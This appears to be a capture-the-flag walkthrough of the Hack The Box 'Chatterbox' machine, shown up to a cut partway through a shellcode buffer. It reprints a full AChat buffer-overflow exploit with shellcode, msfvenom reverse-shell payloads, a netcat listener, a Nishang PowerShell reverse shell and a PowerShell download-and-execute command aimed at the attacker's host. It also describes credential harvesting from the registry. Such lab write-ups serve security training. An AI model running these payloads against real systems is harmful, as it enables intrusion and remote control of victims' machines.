Summary
Chatterbox involves exploiting a Windows 7 system. Initial enumeration reveals the AChat service (port 9256) vulnerable to a Remote Buffer Overflow (CVE-2015-1578). Using a public exploit, a reverse shell is gained as user Alfred. Privilege escalation is achieved by discovering the Administrator’s plaintext password Welcome1! in the Windows Registry (HKLM\...\Winlogon). This credential allows executing Impacket-psexec to gain SYSTEM access. Alternatively, modifying file permissions via icacls or using RunasCs provides root flag access.
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| └─# nmap -p- --min-rate 10000 --max-retries 1 $box -Pn -oA nmap/port-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-10 23:15 IST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).
Not shown: 47871 closed tcp ports (reset), 17653 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
9255/tcp open mon
9256/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| └─# nmap -sC -sV -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 $box -Pn -oA nmap/scripts
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-10 23:18 IST
Nmap scan report for 10.10.10.74
Host is up (0.58s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
|_http-title: Site doesn't have a title.
|_http-server-header: AChat
9256/tcp open achat AChat chat system
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-01-10T17:49:27-05:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_clock-skew: mean: 6h40m01s, deviation: 2h53m15s, median: 4h59m59s
| smb2-time:
| date: 2025-01-10T22:49:24
|_ start_date: 2025-01-10T08:47:15
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.36 seconds
|
SMB - 139,445
1
2
3
4
5
6
7
8
9
| └─# smbclient -L $box
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
|
AChat - 9255,9256
1
2
3
4
5
6
7
8
9
10
| └─# searchsploit achat
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txt
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
|
Now let’s download the Remote Buffer Overflow code,
1
2
3
4
5
6
7
8
| └─# searchsploit -m windows/remote/36025.py
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/36025
Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /root/htb/chatterbox/36025.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
| #!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| └─# msfvenom -a x86 --platform Windows -p windows/exec CMD='ping 10.10.16.6' -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 526 (iteration=0)
x86/unicode_mixed chosen with final size 526
Payload size: 526 bytes
Final size of python file: 2599 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x59\x6c\x57\x78\x71\x72\x4d\x30"
buf += b"\x4d\x30\x59\x70\x33\x30\x71\x79\x79\x55\x6d\x61"
buf += b"\x57\x50\x70\x64\x52\x6b\x32\x30\x50\x30\x72\x6b"
buf += b"\x50\x52\x7a\x6c\x34\x4b\x31\x42\x4a\x74\x42\x6b"
buf += b"\x52\x52\x6b\x78\x5a\x6f\x56\x57\x4f\x5a\x4c\x66"
buf += b"\x6d\x61\x4b\x4f\x74\x6c\x4f\x4c\x61\x51\x33\x4c"
buf += b"\x79\x72\x6e\x4c\x4d\x50\x75\x71\x46\x6f\x7a\x6d"
buf += b"\x69\x71\x39\x37\x6b\x32\x68\x72\x51\x42\x6e\x77"
buf += b"\x54\x4b\x4e\x72\x4e\x30\x52\x6b\x6d\x7a\x6d\x6c"
buf += b"\x52\x6b\x50\x4c\x4e\x31\x73\x48\x78\x63\x70\x48"
buf += b"\x49\x71\x38\x51\x72\x31\x42\x6b\x4f\x69\x6b\x70"
buf += b"\x7a\x61\x47\x63\x34\x4b\x31\x39\x4a\x78\x4a\x43"
buf += b"\x6e\x5a\x6d\x79\x54\x4b\x30\x34\x34\x4b\x59\x71"
buf += b"\x77\x66\x6c\x71\x4b\x4f\x36\x4c\x49\x31\x78\x4f"
buf += b"\x7a\x6d\x59\x71\x37\x57\x6c\x78\x37\x70\x70\x75"
buf += b"\x4b\x46\x4c\x43\x71\x6d\x79\x68\x4f\x4b\x53\x4d"
buf += b"\x6c\x64\x51\x65\x4b\x34\x31\x48\x32\x6b\x30\x58"
buf += b"\x6b\x74\x6a\x61\x67\x63\x4f\x76\x52\x6b\x7a\x6c"
buf += b"\x30\x4b\x74\x4b\x30\x58\x6b\x6c\x5a\x61\x7a\x33"
buf += b"\x42\x6b\x69\x74\x52\x6b\x39\x71\x7a\x30\x43\x59"
buf += b"\x61\x34\x4c\x64\x4d\x54\x6f\x6b\x4f\x6b\x33\x31"
buf += b"\x72\x39\x6f\x6a\x52\x31\x79\x6f\x37\x70\x61\x4f"
buf += b"\x31\x4f\x4e\x7a\x42\x6b\x4a\x72\x5a\x4b\x34\x4d"
buf += b"\x61\x4d\x31\x5a\x6a\x61\x44\x4d\x35\x35\x45\x62"
buf += b"\x4d\x30\x39\x70\x79\x70\x32\x30\x30\x68\x6e\x51"
buf += b"\x34\x4b\x62\x4f\x55\x37\x49\x6f\x67\x65\x77\x4b"
buf += b"\x4a\x50\x57\x45\x47\x32\x51\x46\x30\x68\x75\x56"
buf += b"\x64\x55\x57\x4d\x73\x6d\x59\x6f\x57\x65\x6d\x6c"
buf += b"\x39\x76\x51\x6c\x59\x7a\x33\x50\x39\x6b\x69\x50"
buf += b"\x50\x75\x59\x75\x67\x4b\x70\x47\x4c\x53\x50\x72"
buf += b"\x52\x4f\x61\x5a\x4d\x30\x72\x33\x4b\x4f\x76\x75"
buf += b"\x50\x70\x62\x49\x52\x4e\x72\x47\x6f\x30\x30\x31"
buf += b"\x4e\x50\x4e\x4e\x4e\x51\x4c\x70\x6c\x6e\x4e\x51"
buf += b"\x4d\x66\x4e\x4e\x4e\x56\x6b\x50\x41\x41"
|
Now we will replace the buf code on our python script rbo.py
1
2
| └─# python2 rbo.py
---->{P00F}!
|
1
2
3
4
5
6
7
8
9
10
11
| └─# tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
02:36:10.628464 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 5, length 40
02:36:10.628506 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 5, length 40
02:36:11.596465 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 6, length 40
02:36:11.596498 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 6, length 40
02:36:12.595055 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 7, length 40
02:36:12.595094 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 7, length 40
02:36:13.698852 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 8, length 40
02:36:13.698906 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 8, length 40
|
We can see in our tcpdump that we have received the ping from the target machine
We can conclude that the AChat application is vulnerable to Remote Buffer Overflow
Reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
| └─# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x79\x6c\x79\x58\x53\x52\x4b\x50"
buf += b"\x4b\x50\x39\x70\x51\x50\x43\x59\x48\x65\x4c\x71"
buf += b"\x57\x50\x61\x54\x52\x6b\x6e\x70\x6c\x70\x74\x4b"
buf += b"\x4f\x62\x6a\x6c\x52\x6b\x52\x32\x4c\x54\x72\x6b"
buf += b"\x34\x32\x6f\x38\x6a\x6f\x66\x57\x6d\x7a\x4b\x76"
buf += b"\x70\x31\x69\x6f\x66\x4c\x6d\x6c\x31\x51\x71\x6c"
buf += b"\x6a\x62\x6e\x4c\x4f\x30\x49\x31\x68\x4f\x4c\x4d"
buf += b"\x7a\x61\x47\x57\x49\x52\x4a\x52\x4f\x62\x6e\x77"
buf += b"\x52\x6b\x6e\x72\x6e\x30\x42\x6b\x50\x4a\x6d\x6c"
buf += b"\x42\x6b\x30\x4c\x6a\x71\x54\x38\x37\x73\x51\x38"
buf += b"\x4b\x51\x57\x61\x4f\x61\x42\x6b\x4f\x69\x4d\x50"
buf += b"\x6a\x61\x38\x53\x52\x6b\x4d\x79\x6c\x58\x47\x73"
buf += b"\x4c\x7a\x4d\x79\x74\x4b\x4f\x44\x74\x4b\x7a\x61"
buf += b"\x56\x76\x6c\x71\x69\x6f\x46\x4c\x35\x71\x66\x6f"
buf += b"\x6a\x6d\x39\x71\x58\x47\x4c\x78\x37\x70\x43\x45"
buf += b"\x68\x76\x7a\x63\x71\x6d\x4b\x48\x4d\x6b\x33\x4d"
buf += b"\x4c\x64\x70\x75\x37\x74\x70\x58\x32\x6b\x52\x38"
buf += b"\x4d\x54\x5a\x61\x47\x63\x70\x66\x54\x4b\x6c\x4c"
buf += b"\x30\x4b\x74\x4b\x70\x58\x6b\x6c\x69\x71\x78\x53"
buf += b"\x52\x6b\x4a\x64\x74\x4b\x6d\x31\x58\x50\x73\x59"
buf += b"\x4e\x64\x6f\x34\x6d\x54\x6f\x6b\x31\x4b\x31\x51"
buf += b"\x61\x49\x51\x4a\x30\x51\x69\x6f\x57\x70\x71\x4f"
buf += b"\x4f\x6f\x50\x5a\x42\x6b\x6a\x72\x6a\x4b\x52\x6d"
buf += b"\x4f\x6d\x71\x58\x70\x33\x6f\x42\x49\x70\x4b\x50"
buf += b"\x61\x58\x62\x57\x61\x63\x30\x32\x31\x4f\x61\x44"
buf += b"\x6f\x78\x4e\x6c\x70\x77\x4f\x36\x4d\x37\x69\x6f"
buf += b"\x68\x55\x76\x58\x52\x70\x39\x71\x4b\x50\x39\x70"
buf += b"\x4d\x59\x77\x54\x50\x54\x4e\x70\x33\x38\x6d\x59"
buf += b"\x71\x70\x42\x4b\x6d\x30\x79\x6f\x48\x55\x52\x30"
buf += b"\x72\x30\x42\x30\x4e\x70\x31\x30\x70\x50\x61\x30"
buf += b"\x72\x30\x32\x48\x38\x6a\x6c\x4f\x37\x6f\x57\x70"
buf += b"\x4b\x4f\x57\x65\x72\x77\x32\x4a\x4d\x35\x70\x68"
buf += b"\x79\x7a\x39\x7a\x6e\x30\x4a\x66\x43\x38\x4d\x32"
buf += b"\x59\x70\x4a\x61\x65\x6b\x62\x69\x47\x76\x42\x4a"
buf += b"\x4c\x50\x6e\x76\x6e\x77\x71\x58\x54\x59\x37\x35"
buf += b"\x30\x74\x73\x31\x69\x6f\x46\x75\x55\x35\x79\x30"
buf += b"\x74\x34\x6c\x4c\x4b\x4f\x4e\x6e\x6c\x48\x33\x45"
buf += b"\x4a\x4c\x6f\x78\x38\x70\x74\x75\x56\x42\x72\x36"
buf += b"\x79\x6f\x6a\x35\x72\x48\x73\x33\x70\x6d\x4f\x74"
buf += b"\x4b\x50\x54\x49\x4a\x43\x72\x37\x4f\x67\x31\x47"
buf += b"\x6c\x71\x49\x66\x72\x4a\x6c\x52\x32\x39\x6f\x66"
buf += b"\x5a\x42\x39\x6d\x31\x56\x48\x47\x31\x34\x6e\x44"
buf += b"\x6f\x4c\x6b\x51\x4b\x51\x64\x4d\x6d\x74\x4b\x74"
buf += b"\x7a\x70\x55\x76\x6d\x30\x70\x44\x61\x44\x30\x50"
buf += b"\x6f\x66\x31\x46\x50\x56\x4f\x56\x31\x46\x70\x4e"
buf += b"\x51\x46\x32\x36\x6e\x73\x51\x46\x73\x38\x50\x79"
buf += b"\x46\x6c\x4d\x6f\x64\x46\x69\x6f\x68\x55\x71\x79"
buf += b"\x57\x70\x30\x4e\x30\x56\x61\x36\x79\x6f\x30\x30"
buf += b"\x50\x68\x6c\x48\x52\x67\x4d\x4d\x53\x30\x79\x6f"
buf += b"\x37\x65\x35\x6b\x58\x70\x58\x35\x36\x42\x61\x46"
buf += b"\x30\x68\x74\x66\x46\x35\x35\x6d\x43\x6d\x39\x6f"
buf += b"\x6a\x35\x4f\x4c\x4c\x46\x53\x4c\x79\x7a\x35\x30"
buf += b"\x59\x6b\x77\x70\x34\x35\x39\x75\x37\x4b\x30\x47"
buf += b"\x5a\x73\x43\x42\x70\x6f\x31\x5a\x69\x70\x52\x33"
buf += b"\x49\x6f\x49\x45\x41\x41"
|
1
2
| └─# python2 rbo.py
---->{P00F}!
|
1
2
3
4
5
6
7
8
9
| └─# rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
|
Let’s get the user flag,
1
2
3
| C:\Users\Alfred\Desktop>type user.txt
type user.txt
d5b2xxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
Nishang Powershell
Make sure you add the below line to the powershell script,
1
2
| └─# cat Invoke-PowerShellTcp.ps1 | tail -n 2
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.6 -Port 443
|
Update the rbo.py script,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| └─# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.6/Invoke-PowerShellTcp.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 704 (iteration=0)
x86/unicode_mixed chosen with final size 704
Payload size: 704 bytes
Final size of python file: 3476 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x49\x6c\x4a\x48\x62\x62\x39\x70"
buf += b"\x39\x70\x6d\x30\x61\x50\x43\x59\x79\x55\x6c\x71"
buf += b"\x79\x30\x71\x54\x62\x6b\x50\x50\x6e\x50\x44\x4b"
buf += b"\x4e\x72\x4c\x4c\x54\x4b\x4e\x72\x6d\x44\x42\x6b"
buf += b"\x64\x32\x6b\x78\x4a\x6f\x47\x47\x6d\x7a\x6f\x36"
buf += b"\x4e\x51\x4b\x4f\x46\x4c\x6d\x6c\x6f\x71\x53\x4c"
buf += b"\x4c\x42\x6e\x4c\x4b\x70\x77\x51\x68\x4f\x7a\x6d"
buf += b"\x69\x71\x76\x67\x47\x72\x4c\x32\x4f\x62\x6f\x67"
buf += b"\x52\x6b\x4f\x62\x7a\x70\x64\x4b\x50\x4a\x6d\x6c"
buf += b"\x64\x4b\x70\x4c\x6c\x51\x33\x48\x37\x73\x6f\x58"
